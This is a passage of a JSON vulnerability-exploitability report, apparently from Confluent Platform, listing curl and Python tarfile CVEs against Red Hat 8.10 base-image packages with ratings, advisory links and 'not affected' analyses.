      "updated": "2026-06-17T08:32:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13034",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        295
      ],
      "description": "When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`\nwith the curl tool,curl should check the public key of the server certificate\nto verify the peer.\n\nThis check was skipped in a certain condition that would then make curl allow\nthe connection without performing the proper check, thus not noticing a\npossible impostor. To skip this check, the connection had to be done with QUIC\nwith ngtcp2 built to use GnuTLS and the user had to explicitly disable the\nstandard certificate verification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13034"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13034"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r76-qj98-jfhc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13034"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13034"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:33:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13462",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        74,
        434
      ],
      "description": "The \"tarfile\" module would still apply normalization of AREGTYPE (\\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_LONGNAME or GNUTYPE_LONGLINK. This could result in a crafted tar archive being misinterpreted by the tarfile module compared to other implementations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13462"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13462"
        },
        {
          "url": "https://github.com/python/cpython/commit/42d754e34c06e57ad6b8e7f92f32af679912d8ab"
        },
        {
          "url": "https://github.com/python/cpython/commit/72dde1016493c52abe857fc4a7bf6c40138b4114"
        },
        {
          "url": "https://github.com/python/cpython/commit/7ad3093d76a748af55bdb1d2e8aad3638163b017"
        },
        {
          "url": "https://github.com/python/cpython/commit/9a23b753552afa28e3a2f4d8863572fc66479406"
        },
        {
          "url": "https://github.com/python/cpython/commit/ae99fe3a33b43e303a05f012815cef60b611a9c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/d10950739a78f54d0718d88fb5a868374603c084"
        },
        {
          "url": "https://github.com/python/cpython/issues/141707"
        },
        {
          "url": "https://github.com/python/cpython/pull/143934"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/EOMI5I66ZMKQ2INNFT6T7IAIKUGPZYIE/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13462"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13462"
        }
      ],
      "published": "2026-03-12T18:16:21+00:00",
      "updated": "2026-08-13T01:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
